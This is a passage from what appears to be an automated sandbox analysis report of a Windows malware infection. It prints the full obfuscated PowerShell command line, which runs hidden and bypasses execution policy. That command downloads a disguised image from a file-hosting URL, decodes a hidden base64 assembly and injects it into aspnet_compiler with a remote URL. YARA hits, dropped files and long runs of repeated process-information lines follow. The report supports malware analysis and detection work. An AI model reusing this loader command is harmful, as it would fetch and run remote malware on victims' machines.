'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"	Jump to behavior

Yara detected aPLib compressed binary

Source: Yara match	File source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_031736C8 push ebx; iretd	1_2_031736DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04630A68 push edx; iretd	9_2_04630A72
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04630B25 push ebp; iretd	9_2_04630B2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04631BED pushad ; iretd	9_2_04631BF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402AC0 push eax; ret	13_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402AC0 push eax; ret	13_2_00402AFC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
